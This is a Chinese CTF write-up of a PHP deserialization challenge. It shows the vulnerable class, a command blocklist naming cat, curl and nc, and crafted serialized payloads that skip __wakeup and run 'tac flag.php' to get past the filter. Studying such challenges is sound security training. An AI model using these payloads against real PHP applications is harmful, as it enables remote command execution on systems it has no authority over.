本文共 1732 字，大约阅读时间需要 5 分钟。

 解码

 告诉我有备份文件。

 找到这个

   ";class ctf{    protected $username = 'hack';    protected $cmd = 'NULL';    public function __construct($username,$cmd)    {        $this->username = $username;        $this->cmd = $cmd;    }    function __wakeup()    {        $this->username = 'guest';    }    function __destruct()    {        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))        {            exit('
flag能让你这么容易拿到吗？
');        }        if ($this->username === 'admin')        {           // echo "
right!
";            $a = `$this->cmd`;            var_dump($a);        }else        {            echo "
给你个安慰奖吧，hhh！
";            die();        }    }}    $select = $_GET['code'];    $res=unserialize(@$select);?>

代码审计

是个关于反序列化的题目。

过滤了很多读取文件的命令：

不过还剩下tac看来是要读取文件了

关于反序列化：

访问控制修饰符的不同 序列化后的 属性长度和属性值会有所不同,所以这里总结一下：

public(公有)protected(受保护)private(私有的)protected属性被序列化的时候属性值会变成：%00*%00属性名private属性被序列化的时候属性值会变成：%00类名%00属性名

 PHP的魔术函数也总结一下：

PHP中把以两个下划线__开头的方法称为魔术方法，这些方法在PHP中充当了举足轻重的作用。 魔术方法包括    __construct()，类的构造函数，当对象创建(new)时会自动调用    __destruct()，类的析构函数，当对象被销毁时会自动调用    __call()，在对象中调用一个不可访问方法时调用    __callStatic()，用静态方式中调用一个不可访问方法时调用    __get()，获得一个类的成员变量时调用    __set()，设置一个类的成员变量时调用    __isset()，当对不可访问属性调用isset()或empty()时调用    __unset()，当对不可访问属性调用unset()时被调用。    __sleep()，执行serialize()时，先会调用这个函数    __wakeup()，执行unserialize()时，先会调用这个函数    __toString()，类被当成字符串时的回应方法    __invoke()，调用函数的方式调用一个对象时的回应方法    __set_state()，调用var_export()导出类时，此静态方法会被调用。    __clone()，当对象复制完成时调用

所以我构造的payload：

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}

因为这里是protected所以是%00*%00共占三位

code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}

转载地址：http://eytgn.baihongyu.com/